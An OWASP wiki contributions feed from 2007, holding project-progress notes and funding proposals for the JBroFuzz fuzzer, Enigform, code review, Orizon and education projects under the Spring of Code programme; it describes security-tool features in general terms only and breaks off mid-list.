https://wiki.owasp.org/api.php?action=feedcontributions&feedformat=atom&user=Subere OWASP - User contributions [en] 2026-04-22T16:36:15Z User contributions MediaWiki 1.27.2 https://wiki.owasp.org/index.php?title=SpoC_007_-_OWASP_JBroFuzz_Project_-_Progress_Page&diff=21181 SpoC 007 - OWASP JBroFuzz Project - Progress Page 2007-08-28T12:56:43Z <p>Subere: New page: JBroFuzz has reached the 50% mark in terms of development for the SpoC 007. Tested on mac osx, win32 and a few linux flavours. Current version is 0.7. Get it from the [http://www.sourcef...</p> <hr /> <div>JBroFuzz has reached the 50% mark in terms of development for the SpoC 007. <br /> <br /> Tested on mac osx, win32 and a few linux flavours. Current version is 0.7. Get it from the [http://www.sourceforge.net/projects/jbrofuzz Download Section].<br /> <br /> Below is a list of things completed:<br /> <br /> * [Done] Open Source Tab<br /> <br /> Given a domain name, by submitting five google searches, JBroFuzz will yield back the corresponding email addresses available for that domain. This is really useful for enumerating or recovering valid username formats, etc.<br /> <br /> * [Done] TCP Fuzzing tab allowing graph outputs<br /> <br /> Once fuzzing has been performed on any interface, a user can select the Bro button in order to get a normalised plot of the fuzzing responses obtained. This is really useful in terms of minimising time to analyse any results.<br /> <br /> * [Done] TCP Sniffing tab update thread Agent Queue<br /> <br /> TCP Sniffing has become more robust. A complete re-write of how exceptions are handled has made the listener a lot more stable.<br /> <br /> * [Done] Update Generators file format<br /> <br /> The file format has been updated to include a number of generators. This work ties in as a continuation towards using the XSSDB from GNU Citizen.<br /> <br /> The upcoming code in order to complete the code are as follows:<br /> <br /> * Include all XSS Generators from GNU Citizen<br /> * New (pure) HTTP/S Fuzzing Tab using HTTPClient<br /> * Include SOAP and XML fuzzing <br /> * NTLM Brute Force over HTTP/S Tab<br /> * Blind SQL Injection Fuzzing Tab</div> Subere https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_-_Projects&diff=20451 OWASP Spring Of Code 2007 - Projects 2007-07-29T17:49:22Z <p>Subere: </p> <hr /> <div>== All SpoC Projects ==<br /> <br /> <br /> {| class=&quot;wikitable&quot; WIDTH=100%<br /> |-<br /> ! SpoC Project Name<br /> ! Author<br /> ! Confirmed<br /> ! Status<br /> ! Coordinated by <br /> |-<br /> <br /> |-<br /> ! [[SpoC 007 - The OWASP Web Security Certification Framework|The OWASP Web Security Certification Framework]]<br /> | Mark Curphey<br /> | Yes<br /> | 45% <br /> | OWASP Board<br /> <br /> |-<br /> ! [[SpoC 007 - SqlMap|SqlMap]]<br /> | Bernardo Damele<br /> | Yes<br /> | 60% (to review)<br /> | Dinis Cruz<br /> <br /> |-<br /> ! [[SpoC 007 - OWASP Site Generator|OWASP Site Generator]]<br /> | Boris<br /> | Yes<br /> | 0% <br /> | Dinis Cruz<br /> <br /> |-<br /> ! [[SpoC 007 - Attacks Reference Guide|Attacks Reference Guide]]<br /> | NSRAV Security Research Group<br /> | Yes<br /> | 0% <br /> | TBA<br /> <br /> |-<br /> ! [[SpoC 007 - The Scholastic Application Security Assessment Project|The Scholastic Application Security Assessment Project]]<br /> | Eric Sheridan and <br /> Dr. Goran Trajkovski<br /> | Yes<br /> | 0% <br /> | TBA<br /> <br /> |-<br /> ! [[SpoC 007 - Inspekt|Inspekt: Input filtering and validation library for PHP]]<br /> | Ed Finkler<br /> | Yes<br /> | 50% (to review)<br /> | Andrew v d Stock <br /> <br /> |-<br /> ! [[SpoC 007 - Code review Project|Code review Project]]<br /> | Eoin Keary<br /> | Yes<br /> | 25% <br /> | Dinis Cruz<br /> <br /> |-<br /> ! [[SpoC 007 - OWASP Certification Project|OWASP Certification Project]]<br /> | Matteo Meucci<br /> | Yes<br /> | 0% <br /> | Dinis Cruz<br /> <br /> |-<br /> ! [[SpoC 007 - OWASP Education Project|OWASP Education Project]]<br /> | Sebastien Deleersnyder<br /> | Yes<br /> | 37,5% <br /> | Dinis Cruz<br /> <br /> |-<br /> ! [[SpoC 007 - OWASP The Anti-Samy Project|OWASP The Anti-Samy Project]]<br /> | Arshan Dabirsiaghi<br /> | Yes<br /> | 0% <br /> | TBA<br /> <br /> |-<br /> ! [[SpoC 007 - Security throughout the SDLC|Security throughout the SDLC]]<br /> | Keith Casey<br /> | Yes<br /> | 0% <br /> | TBA<br /> <br /> |-<br /> ! [[SpoC 007 - OWASP WebGoat Solutions Guide|OWASP WebGoat Solutions Guide]]<br /> | Erwin Geirnaert<br /> | Yes<br /> | 90% <br /> | Jeff Williams<br /> <br /> |-<br /> ! [[SpoC 007 - OWASP WeBekci Project|OWASP WeBekci Project]]<br /> | Bunyamin Demir<br /> | Yes<br /> | 0% <br /> | Ivan Ristic <br /> <br /> |-<br /> ! [[SpoC 007 - Python Tainted Mode|Python Tainted Mode]]<br /> | Denis<br /> | Yes<br /> | 0% <br /> | TBA<br /> <br /> |-<br /> ! [[SpoC 007 - WebScarab NG Security Test Automation|WebScarab NG Security Test Automation]]<br /> | Darren Edmonds<br /> | Yes<br /> | 0% <br /> | Jeff Williams<br /> <br /> |-<br /> ! [[SpoC 007 - Refresh Attacks list|Refresh Attacks list]]<br /> | Przemyslaw 'rezos' Skowron<br /> | Yes<br /> | 0% <br /> | TBA<br /> <br /> |-<br /> ! [[SpoC 007 - Best Practices &amp; Countermeasures|Best Practices &amp; Countermeasures]]<br /> | Jim<br /> | Yes<br /> | 0% <br /> | TBA<br /> <br /> |-<br /> ! [[SpoC 007 - OWASP Brand|OWASP brand]]<br /> | Paulo Coimbra<br /> | Yes<br /> | 0% <br /> | Dinis Cruz<br /> <br /> |-<br /> ! [[SpoC 007 - Web Application Security put into practice|Web Application Security put into practice]]<br /> | Heiko Webers<br /> | Yes<br /> | 60% <br /> | TBA<br /> <br /> |-<br /> ! [[SpoC 007 - OWASP JBroFuzz Project|OWASP JBroFuzz Project]]<br /> | Subere<br /> | Yes<br /> | 40% <br /> | TBA<br /> <br /> |-<br /> ! [[SpoC 007 - Owasp Orizon Project|Owasp Orizon Project]]<br /> | Paolo Perego<br /> | Yes<br /> | 45% <br /> | Dinis Cruz<br /> <br /> |-<br /> ! [[SpoC 007 - Enigform: Firefox Addon for OpenPGP signing of HTTP requests|Enigform: Firefox Addon for OpenPGP signing of HTTP requests]]<br /> | Arturo (Buanzo) Busleiman<br /> | Yes<br /> | half term review: done <br /> | Dinis Cruz<br /> <br /> |-<br /> ! [[SpoC 007 - OWASP LiveCD Education Project|OWASP LiveCD Education Project]]<br /> | Josh Sweeney<br /> | Yes<br /> | 50% (to review) <br /> | Eoin Keary<br /> <br /> |-<br /> ! [[SpoC 007 - OWASP Java Project|OWASP Java Project]]<br /> | Erwin Geirnaert<br /> | Yes<br /> | 0% <br /> | Jeff Williams<br /> <br /> |-<br /> ! [[SpoC 007 - OWASP LiveCD Project|OWASP LiveCD Project]]<br /> | Joshua Perrymon<br /> | Yes<br /> | 0% <br /> | Eoin Keary<br /> <br /> |-<br /> ! [[SpoC 007 - Interim @ Aspect Offices|Interim @ Aspect Offices]]<br /> | Andy Gocke<br /> | Yes<br /> | 0% <br /> | Jeff Williams<br /> <br /> |-<br /> ! [[SpoC 007 - 10x 1000USD to FOSS projects we all use |10x 1000USD to FOSS projects we all use ]]<br /> | (tbd)<br /> | No<br /> | 0% <br /> | Dinis Cruz<br /> <br /> |-<br /> ! [[SpoC 007 - Help with SpoC project management|Help with SpoC project management]]<br /> | Paulo Coimbra<br /> | Yes<br /> | 0% <br /> | Dinis Cruz<br /> <br /> |}</div> Subere https://wiki.owasp.org/index.php?title=File:Jbrofuzz-results.png&diff=20374 File:Jbrofuzz-results.png 2007-07-29T05:00:50Z <p>Subere: An image screenshot of results while performing a Man-In-The-Middle eavesdropping session using the &quot;TCP Sniffing&quot; tab. JBroFuzz can be used as a TCP Proxy Fuzzer when the results from the &quot;TCP Sniffing&quot; tab are placed in the &quot;TCP Fuzzing&quot; tab.</p> <hr /> <div>An image screenshot of results while performing a Man-In-The-Middle eavesdropping session using the &quot;TCP Sniffing&quot; tab. JBroFuzz can be used as a TCP Proxy Fuzzer when the results from the &quot;TCP Sniffing&quot; tab are placed in the &quot;TCP Fuzzing&quot; tab.</div> Subere https://wiki.owasp.org/index.php?title=File:JBroFuzz-Image.png&diff=20368 File:JBroFuzz-Image.png 2007-07-29T04:29:11Z <p>Subere: A screenshot image of JBroFuzz to be placed on the website.</p> <hr /> <div>A screenshot image of JBroFuzz to be placed on the website.</div> Subere https://wiki.owasp.org/index.php?title=File:JBroFuzz-splash.jpg&diff=20366 File:JBroFuzz-splash.jpg 2007-07-29T03:58:26Z <p>Subere: </p> <hr /> <div></div> Subere https://wiki.owasp.org/index.php?title=File:Jbrofuzz-splash.jpg&diff=20365 File:Jbrofuzz-splash.jpg 2007-07-29T03:54:29Z <p>Subere: The splash screen for JBroFuzz, seen on the website's main page.</p> <hr /> <div>The splash screen for JBroFuzz, seen on the website's main page.</div> Subere https://wiki.owasp.org/index.php?title=File:Splash.jpg&diff=20364 File:Splash.jpg 2007-07-29T03:52:41Z <p>Subere: </p> <hr /> <div></div> Subere https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_Applications&diff=17349 OWASP Spring Of Code 2007 Applications 2007-03-20T11:36:54Z <p>Subere: /* Why should JBroFuzz should be sponsored? */</p> <hr /> <div>This page contains project Applications to the [[OWASP_Spring_Of_Code_2007]]<br /> <br /> '''If you want to apply for a SpoC 007 sponsorship you HAVE TO USE THIS PAGE for your application'''<br /> <br /> See [[OWASP_Spring_Of_Code_2007#How_To_Participate]] for what do to one you completed your Application<br /> <br /> ---------<br /> <br /> <br /> '''Proposed template:''' {for longer proposals, in addition to these details you can create a PDF}:<br /> <br /> == {Your first name or Alias} - {Project name} ==<br /> Please remember that projects will be selected and funded based on how well they meet the [[OWASP_Spring_Of_Code_2007_:_Selection|Selection Criteria]].<br /> <br /> You can propose your project in any form you wish, but the best proposals will be well thought out, clear and concise, and reflective of your passion for the topic. We strongly suggest that you include the following information in your proposal.<br /> <br /> * Your educational and professional background<br /> <br /> * Application security experience and accomplishments<br /> <br /> * Participation and leadership in open communities<br /> <br /> * The opportunity, challenges, issues or need your proposal addresses<br /> <br /> * Objectives or ways in which you will meet the goal(s)<br /> <br /> * Specific activities and who will carry out these activities<br /> <br /> * Specific deliverables and a rough project schedule so we can track progress<br /> <br /> * Long-term vision for the project<br /> <br /> * Any other reasons why you and your project should be selected<br /> <br /> == Buanzo - Enigform: Firefox Addon for OpenPGP signing of HTTP requests ==<br /> <br /> I am a 25 year old Independent security consultant from Buenos Aires, Argentina, that has contributed to the world of<br /> information systems security since 1994, when BBSes and Linux still lived together.<br /> <br /> I quick search for buanzo on google [http://www.google.com/search?hl=en&amp;q=buanzo&amp;btnG=Google+Search] will provide all necessary details about my professional and community background. For comprobable experience, you could also check my Rent a Coder profile.[http://www.rentacoder.com/RentACoder/SoftwareCoders/showBioInfo.asp?lngAuthorId=735204].<br /> <br /> In my free time I like playing with my Punk-Pop band [http://www.purevolume.com/futurabandapunkpop], Futurabanda. [http://www.futurabanda.com.ar], and maintaining my Restaurants, Wines and Recipes site. [http://www.vivamoslavida.com.ar]. I have to admit that my first priorities are my beloved son [http://www.fotolog.com/buanzo] and my wonderful wife [http://www.fotolog.com/buanzo].<br /> <br /> === Accomplishments ===<br /> <br /> I've contributed scripts, fixes and translations to the Nmap project. I've also acted as Expert Contributor for SANS TOP-20 2004, 2005 and 2006. I've developed <br /> lots that can be found in Freshmeat, like mprl (a getty enhancement to allow remote logins from the login: prompt of the console). I've also written<br /> the Unix chapter of the OISSG's Information Systems Security Assessment Framework, v0.1 [http://www.oissg.org/content/view/71/71/]. I'm currently writing<br /> an Internet Draft to be proposed for RFC regarding Enigform.<br /> <br /> === Community ===<br /> <br /> I run the official 2600 meetings site for Argentina [http://www.2600.com/meetings/pages.html], I've been proposed, but I refused, for President of the Argentinian Free Software group called SOLAR [www.solar.org.ar]. I'm an active member of the FLOSS community since 1996, having written articles in magazines http://www.net-security.org/dl/articles/Detecting_and_Understanding_rootkits.txt, made TV, radio<br /> and newspaper appearances [http://codigoabierto.bitacoras.com/archivos/2005/04/01/buanzo-hacks] and led different security research groups of Spain, Mexico and Argentina. Currently I contribute time thorugh my sites, forums and blogs,<br /> answering questions in mailing lists and helping coordinate some local LUGs. I do also manager the Linux Counter for Argentina [http://counter.li.org/reports/place.php?place=AR].<br /> <br /> === My Project ===<br /> <br /> Enigform [http://enigform.mozdev.org] is a Firefox extension that enhances HTTP with OpenPGP functionality. It digitally signs outgoing HTTP requests so that a web server can authenticate<br /> the identity and data of the incoming request. It is a Web Security tool because it can, if correctly implemented as any OpenPGP based technology, render man in<br /> the middle attacks useless. I think OpenPGP already speaks for itself regarding eMail. Imagine the same benefits for http and web applications.<br /> <br /> Enigform is the reference implementation of the Internet Draft I'm working on, in discussion with members of the IETF's OpenPGP Working Group.<br /> <br /> Some simple PHP code is enough to make a web application Enigform-aware [http://enigformtest.buanzo.com.ar]. The Smutty PHP MVC Framework already supports Enigform [http://smutty.pu-gh.com/demo/enigform].<br /> <br /> === Long Term ===<br /> <br /> Have the Draft be proposed as a Standards Track RFC document, have Enigform support directly in Apache and IIS, and port Enigform to other browsers<br /> and/or programming languages, and also provide OpenPGP De/Encryption support.<br /> <br /> <br /> === Why should I be selected ===<br /> <br /> I have the experience, security awareness and means to make this project THE web security project of the decade. I am a respected member of the<br /> international security community, and I firmly believe Enigform is my greatest idea so far.<br /> <br /> == Eoin Keary - Code review Project ==<br /> * '''Executive Summary''':<br /> I am proposing that I complete the OWASP Code review guide during this period.<br /> The code review guide was started by me in 2005 and has much information on reviewing code for common vulnerabilities. It is frequently accessed (looking at the stats on the OWASP site) and therefore is useful to practitioners. <br /> <br /> I believe the code review guide is an integral part of the OWASP BOK (Body of Knowledge). Ensuring secure development is key to secure applications and code review is of paramount importance in this domain.<br /> <br /> There are many sections still to be added and more to be readjusted and rewritten to reflect the current state of the security world.<br /> Much needs to be written on Web 2.0 technologies and distributed B2B technologies such as Webservices.<br /> <br /> The Code review process and procedure needs also to be covered. A guide to establishing a mature code review process also needs to be done.<br /> Code review methodologies also need to be discussed.<br /> <br /> <br /> * '''Objectives and Deliverables''':<br /> <br /> Update of the code review guide:<br /> * Add additional areas relating to the code review process such as:<br /> ** Benefits and pitfalls<br /> ** Methodology<br /> ** The code review process<br /> *** Transactional analysis<br /> *** Managing the code review process<br /> *** Assigning risk to findings<br /> <br /> ** Technical guides<br /> *** Language specific best practice <br /> *** Java <br /> *** .NET <br /> *** PHP <br /> *** MySQL <br /> *** Stored Procs <br /> *** C/C++ <br /> <br /> ** Code review by vulnerability:<br /> *** Reviewing Code for Buffer Overruns and Overflows <br /> *** Reviewing Code for OS Injection<br /> *** Reviewing Code for SQL Injection<br /> *** Reviewing Code for Data Validation<br /> *** Reviewing code for XSS issues<br /> *** Reviewing Code for Error Handling<br /> *** Reviewing Code for Logging Issues<br /> *** Reviewing The Secure Code Environment<br /> *** Reviewing code for Authorization Issues<br /> *** Reviewing code for Authentication Issues<br /> *** Reviewing code for Session Integrity<br /> *** Reviewing code for Cross Site Request Forgery<br /> *** Reviewing code for Cryptography implementation issues<br /> *** Reviewing code Dangerous HTTP Methods (Deployment)<br /> *** Race Conditions <br /> <br /> The areas of code are structured giving a brief explanation, the anti-pattern (vulnerable pattern to look for) and a suggested fix.<br /> <br /> <br /> <br /> * '''Why I should be sponsored for the project''':<br /> <br /> I used to head up the code review team as part of the application security group in fidelity investments and have 5+ years of the secure code review process. <br /> I also was the lead of the Testing guide until V2 was published via the Autumn of Code. <br /> <br /> I have always delivered any work I have volunteered for on time. <br /> <br /> I have been involved in OWASP projects for 2/3 years now and have always been an active contributor.<br /> <br /> == Paolo Perego - Owasp Orizon Project ==<br /> * '''Executive Summary''':<br /> Owasp Orizon [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project] Project born in 2006 as answer to the lack of common engine and library usable by opensource code review related tools.<br /> <br /> I'm proposing that, during the Spring of Code 2007 period, I'll complete static analisys API and java source code enforment objects.<br /> <br /> Sometimes a complete code review approach is not suitable for most customers who wants to harden their code which is being approaching release stage. For such a reason, I started writing Java objects that embeds most of the security checks against common web vulnerabilities (XSS, SQL injection, Session handling, ...) so that source code can be hardened with a small effort in terms of code rewriting.<br /> <br /> I do believe that a common set of API and a common safe coding best practices library is one of the most important goals to bring application security to the developers.<br /> <br /> <br /> * '''Objectives and Deliverables''':<br /> Completing the static code review API section<br /> * improving programming language to XML translator<br /> * improving security best practices code review scan library<br /> * improving secure coding fashion best practices library<br /> * writing the pattern matching scan using the aformentioned libraries<br /> Writing the java source code enforment objects<br /> * writing an object to handle form data values to avoid XSS<br /> * writing an object to handle form data values to avoid SQL Injection<br /> * writing an object to handle HttpRequest and HttpSession objects<br /> <br /> <br /> * '''Why I should be sponsored for the project''':<br /> Owasp Orizon is the first Owasp project I'm involved in. I'm also contributor of Owasp Italian chapter managed by Matteo Meucci and I'm talking at various speeches about application security and safe coding best practices.<br /> <br /> I'm a security consultant working in ethical hacking and we're approaching code review and safe topics right now.<br /> I'm a developer too so I understand also the &quot;dark side&quot; of the problem developing code with security in mind.<br /> <br /> I work using the &quot;release early release often&quot; paradigm so to be concrete and let other people having something usable to work with.<br /> <br /> == Sebastien Deleersnyder - OWASP Education Project ==<br /> * '''Executive Summary''':<br /> This Education project aims to provide in building blocks of web application security information. These modules can be combined together in education tracks targeting different audiences. <br /> <br /> Web Application Security Education and Awareness is needed throughout the entire organization, each area and level of organizations have specific needs and requirements regarding education. A manager needs other information than a security professional or developer. Novices to the profession require other training than people with several years of experience. <br /> <br /> * '''Objectives and Deliverables''':<br /> Currently the project goals are to create Educational Tracks: <br /> * Complete the [[OWASP Education Presentation|consolidation page of OWASP presentations]] performed in the past<br /> * A &quot;Web Application Security Primer&quot; Track for beginners (4 hours) <br /> * A &quot;What developers should know on Web Application Security&quot; Track for developers (4 hours) <br /> <br /> * '''Why you should be sponsored for the project''': <br /> I started the successful Belgian Chapter 3 years ago and have actively contributed to OWASP since then. I also co-organized the European conference last year in Belgium.<br /> <br /> This is the first separate project that I started, originating from a local demand to set up educational tracks for people that are new to Web Application Security. There are literally hundreds of presentations and an enormous amount of information on the OWASP web site. The goal of this project is to restructure pieces of that information in reusable modules that can be combined in educational tracks. It is my believe that awareness is an important cornerstone of building secure web applications, and this project will actively support that.<br /> <br /> If we are granted Spoc 007 participation, I will be sharing the budget with all active participants. This will be an extra motivation for project participation. I will reinvest my part in the project to set up a web conferencing / web casting solution to be used to disseminate the project results and make them available for later use.<br /> <br /> * '''More details''': <br /> The detailed [[OWASP Education Project Roadmap|road map]] can be found here.<br /> The SpoC 007 goal is to finish Sub Goals 1, 2, 3 and 4. If time permits we can start with sub goal 5.<br /> <br /> == Subere - OWASP JBroFuzz Project ==<br /> <br /> ==== Overview ==== <br /> <br /> JBroFuzz is a stateless network protocol fuzzer that emerged from the needs of penetration testing. The purpose of this application is to provide a single, portable application that offers stable cross-platform network protocol fuzzing capabilities. At the same time, JBroFuzz attempts to keep the User Interface (UI) as intuitive as possible.<br /> <br /> ==== Fuzzing ==== <br /> <br /> As seen by the emphasis given on the subject of fuzzing in the 2007 Testing Guide (v2), network protocol fuzzing serves as a fundamental cornerstone of application security testing. For this, many different categories and types of fuzzing have been defined.<br /> <br /> ==== Objectives ==== <br /> <br /> JBroFuzz needs to expand and grow in order to cover network fuzzing in a more complete manner. Its modular implementation allows for the addtion of new functionality by means of independent tabs. The key tabs proposed to be added during the spring of code 2007 are (details in next section):<br /> <br /> * '''Open Source Tab'''<br /> * '''NTLM Brute Force over HTTP/S Tab'''<br /> * '''Pure HTTP/S Fuzzing using HTTPClient'''<br /> * '''Blind SQL Injection Fuzzing Tab'''<br /> <br /> At the same time, the following existing tabs need to be updated and made more robust (details in next section):<br /> <br /> * '''TCP Fuzzing tab allowing graph outputs'''<br /> * '''TCP Sniffing tab update thread Agent Queue'''<br /> * '''Update Generators file format'''<br /> * '''Include SOAP and XML fuzzing'''<br /> <br /> This expansion process relates to stabilising code that is presently included in JBroFuzz, thus allowing it to run for extensive periods of time (24h+) as well as adding more functionality in terms of the three new tabs.<br /> <br /> ==== Deliverables ==== <br /> <br /> Based on the above, the new code elements that will be added are as follows:<br /> <br /> * '''Open Source Tab:''' ''Provide the ability to enumerate e-mails from newsgroups without breaching google automated search rules''<br /> * '''NTLM Brute Force over HTTP/S Tab:''' ''Provide the ability to enumerate NTLM as well as brute over HTTP/S NTLM.''<br /> * '''Pure HTTP/S Fuzzing:''' ''Implement a fuzzing tab utilising HTTPClient from Jakarta that will also allow for multi-threading''<br /> * '''Blind SQL Fuzzing Tab''' ''Implement a tab that extracts information from a blind SQL injection point identified on web server over HTTP/HTTPS.''<br /> <br /> For updating existing code elements that require a partial rewrite, the following areas of focus are presented in detail: <br /> <br /> * '''TCP Fuzzing tab allowing graph outputs:''' ''Provide the ability to graph fuzzing results during a particular session run. This will give the ability to integrate and pickup potential fuzzing patterns.''<br /> * '''TCP Sniffing tab update thread Agent Queue:''' ''Update the code of the sniffing panel in order to handle threaded agents in a more memory efficient way.''<br /> * '''Update Generators file format:''' ''Update the generators file format to allow for the parsing and creation of recursive generators.''<br /> * '''Include SOAP and XML fuzzing:''' ''Include an up to date list of SOAP and XML fuzzing templates.''<br /> <br /> Overall, the above two lists of changes should provide sufficient complexity and output for the spring of code 2007, forming a challenging implementation project.<br /> <br /> ==== Background ==== <br /> <br /> In its short life, the OWASP JBroFuzz Project has attracted the interest of the online security community with a total of appr. 5000 downloads in the last months. <br /> <br /> Coming from a strong java background (5+ years) I decided to implement and release JBroFuzz in order to initially simplify penetrations testing processes that relate to web application and network protocol fuzzing.<br /> <br /> I see the spring of code 2007 as a unique opportunity to industrialise network protocol fuzzing (and in particular HTTP/S fuzzing) within a single application, residing within OWASP.<br /> <br /> ==== Why should JBroFuzz be sponsored? ==== <br /> <br /> Centralising fuzzing resources into one application that has the ability to handle network protocol fuzzing over HTTP and HTTPS in a simple and intuitive manner forms an area of focus that should not be dismissed in building secure software applications.<br /> <br /> Keep the code platform independent adds a huge advantage. <br /> <br /> Receving an OWASP grant from the spring of code 2007 will trigger a share in the budget with all active participants depending on their level of involvement. This will be a direct function of the number of tabs and/or user functionality that they have assisted in implementing.</div> Subere https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_Applications&diff=17282 OWASP Spring Of Code 2007 Applications 2007-03-16T16:24:33Z <p>Subere: </p> <hr /> <div>This page contains project Applications to the [[OWASP_Spring_Of_Code_2007]]<br /> <br /> '''If you want to apply for a SpoC 007 sponsorship you HAVE TO USE THIS PAGE for your application'''<br /> <br /> See [[OWASP_Spring_Of_Code_2007#How_To_Participate]] for what do to one you completed your Application<br /> <br /> ---------<br /> <br /> <br /> '''Proposed template:''' {for longer proposals, in addition to these details you can create a PDF}:<br /> <br /> == {Your first name or Alias} - {Project name} ==<br /> Please remember that projects will be selected and funded based on how well they meet the [[OWASP_Spring_Of_Code_2007_:_Selection|Selection Criteria]].<br /> <br /> You can propose your project in any form you wish, but the best proposals will be well thought out, clear and concise, and reflective of your passion for the topic. We strongly suggest that you include the following information in your proposal.<br /> <br /> * Your educational and professional background<br /> <br /> * Application security experience and accomplishments<br /> <br /> * Participation and leadership in open communities<br /> <br /> * The opportunity, challenges, issues or need your proposal addresses<br /> <br /> * Objectives or ways in which you will meet the goal(s)<br /> <br /> * Specific activities and who will carry out these activities<br /> <br /> * Specific deliverables and a rough project schedule so we can track progress<br /> <br /> * Long-term vision for the project<br /> <br /> * Any other reasons why you and your project should be selected<br /> <br /> <br /> == Eoin Keary - Code review Project ==<br /> * '''Executive Summary''':<br /> I am proposing that I complete the OWASP Code review guide during this period.<br /> The code review guide was started by me in 2005 and has much information on reviewing code for common vulnerabilities. It is frequently accessed (looking at the stats on the OWASP site) and therefore is useful to practitioners. <br /> <br /> I believe the code review guide is an integral part of the OWASP BOK (Body of Knowledge). Ensuring secure development is key to secure applications and code review is of paramount importance in this domain.<br /> <br /> There are many sections still to be added and more to be readjusted and rewritten to reflect the current state of the security world.<br /> Much needs to be written on Web 2.0 technologies and distributed B2B technologies such as Webservices.<br /> <br /> The Code review process and procedure needs also to be covered. A guide to establishing a mature code review process also needs to be done.<br /> Code review methodologies also need to be discussed.<br /> <br /> <br /> * '''Objectives and Deliverables''':<br /> <br /> Update of the code review guide:<br /> * Add additional areas relating to the code review process such as:<br /> ** Benefits and pitfalls<br /> ** Methodology<br /> ** The code review process<br /> *** Transactional analysis<br /> *** Managing the code review process<br /> *** Assigning risk to findings<br /> <br /> ** Technical guides<br /> *** Language specific best practice <br /> *** Java <br /> *** .NET <br /> *** PHP <br /> *** MySQL <br /> *** Stored Procs <br /> *** C/C++ <br /> <br /> ** Code review by vulnerability:<br /> *** Reviewing Code for Buffer Overruns and Overflows <br /> *** Reviewing Code for OS Injection<br /> *** Reviewing Code for SQL Injection<br /> *** Reviewing Code for Data Validation<br /> *** Reviewing code for XSS issues<br /> *** Reviewing Code for Error Handling<br /> *** Reviewing Code for Logging Issues<br /> *** Reviewing The Secure Code Environment<br /> *** Reviewing code for Authorization Issues<br /> *** Reviewing code for Authentication Issues<br /> *** Reviewing code for Session Integrity<br /> *** Reviewing code for Cross Site Request Forgery<br /> *** Reviewing code for Cryptography implementation issues<br /> *** Reviewing code Dangerous HTTP Methods (Deployment)<br /> *** Race Conditions <br /> <br /> The areas of code are structured giving a brief explanation, the anti-pattern (vulnerable pattern to look for) and a suggested fix.<br /> <br /> <br /> <br /> * '''Why I should be sponsored for the project''':<br /> <br /> I used to head up the code review team as part of the application security group in fidelity investments and have 5+ years of the secure code review process. <br /> I also was the lead of the Testing guide until V2 was published via the Autumn of Code. <br /> <br /> I have always delivered any work I have volunteered for on time. <br /> <br /> I have been involved in OWASP projects for 2/3 years now and have always been an active contributor.<br /> <br /> == Paolo Perego - Owasp Orizon Project ==<br /> * '''Executive Summary''':<br /> Owasp Orizon [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project] Project born in 2006 as answer to the lack of common engine and library usable by opensource code review related tools.<br /> <br /> I'm proposing that, during the Spring of Code 2007 period, I'll complete static analisys API and java source code enforment objects.<br /> <br /> Sometimes a complete code review approach is not suitable for most customers who wants to harden their code which is being approaching release stage. For such a reason, I started writing Java objects that embeds most of the security checks against common web vulnerabilities (XSS, SQL injection, Session handling, ...) so that source code can be hardened with a small effort in terms of code rewriting.<br /> <br /> I do believe that a common set of API and a common safe coding best practices library is one of the most important goals to bring application security to the developers.<br /> <br /> <br /> * '''Objectives and Deliverables''':<br /> Completing the static code review API section<br /> * improving programming language to XML translator<br /> * improving security best practices code review scan library<br /> * improving secure coding fashion best practices library<br /> * writing the pattern matching scan using the aformentioned libraries<br /> Writing the java source code enforment objects<br /> * writing an object to handle form data values to avoid XSS<br /> * writing an object to handle form data values to avoid SQL Injection<br /> * writing an object to handle HttpRequest and HttpSession objects<br /> <br /> <br /> * '''Why I should be sponsored for the project''':<br /> Owasp Orizon is the first Owasp project I'm involved in. I'm also contributor of Owasp Italian chapter managed by Matteo Meucci and I'm talking at various speeches about application security and safe coding best practices.<br /> <br /> I'm a security consultant working in ethical hacking and we're approaching code review and safe topics right now.<br /> I'm a developer too so I understand also the &quot;dark side&quot; of the problem developing code with security in mind.<br /> <br /> I work using the &quot;release early release often&quot; paradigm so to be concrete and let other people having something usable to work with.<br /> <br /> == Sebastien Deleersnyder - OWASP Education Project ==<br /> * '''Executive Summary''':<br /> This Education project aims to provide in building blocks of web application security information. These modules can be combined together in education tracks targeting different audiences. <br /> <br /> Web Application Security Education and Awareness is needed throughout the entire organization, each area and level of organizations have specific needs and requirements regarding education. A manager needs other information than a security professional or developer. Novices to the profession require other training than people with several years of experience. <br /> <br /> * '''Objectives and Deliverables''':<br /> Currently the project goals are to create Educational Tracks: <br /> * Complete the [[OWASP Education Presentation|consolidation page of OWASP presentations]] performed in the past<br /> * A &quot;Web Application Security Primer&quot; Track for beginners (4 hours) <br /> * A &quot;What developers should know on Web Application Security&quot; Track for developers (4 hours) <br /> <br /> * '''Why you should be sponsored for the project''': <br /> I started the successful Belgian Chapter 3 years ago and have actively contributed to OWASP since then. I also co-organized the European conference last year in Belgium.<br /> <br /> This is the first separate project that I started, originating from a local demand to set up educational tracks for people that are new to Web Application Security. There are literally hundreds of presentations and an enormous amount of information on the OWASP web site. The goal of this project is to restructure pieces of that information in reusable modules that can be combined in educational tracks. It is my believe that awareness is an important cornerstone of building secure web applications, and this project will actively support that.<br /> <br /> If we are granted Spoc 007 participation, I will be sharing the budget with all active participants. This will be an extra motivation for project participation. I will reinvest my part in the project to set up a web conferencing / web casting solution to be used to disseminate the project results and make them available for later use.<br /> <br /> * '''More details''': <br /> The detailed [[OWASP Education Project Roadmap|road map]] can be found here.<br /> The SpoC 007 goal is to finish Sub Goals 1, 2, 3 and 4. If time permits we can start with sub goal 5.<br /> <br /> == Subere - OWASP JBroFuzz Project ==<br /> <br /> ==== Overview ==== <br /> <br /> JBroFuzz is a stateless network protocol fuzzer that emerged from the needs of penetration testing. The purpose of this application is to provide a single, portable application that offers stable cross-platform network protocol fuzzing capabilities. At the same time, JBroFuzz attempts to keep the User Interface (UI) as intuitive as possible.<br /> <br /> ==== Fuzzing ==== <br /> <br /> As seen by the emphasis given on the subject of fuzzing in the 2007 Testing Guide (v2), network protocol fuzzing serves as a fundamental cornerstone of application security testing. For this, many different categories and types of fuzzing have been defined.<br /> <br /> ==== Objectives ==== <br /> <br /> JBroFuzz needs to expand and grow in order to cover network fuzzing in a more complete manner. Its modular implementation allows for the addtion of new functionality by means of independent tabs. The key tabs proposed to be added during the spring of code 2007 are (details in next section):<br /> <br /> * '''Open Source 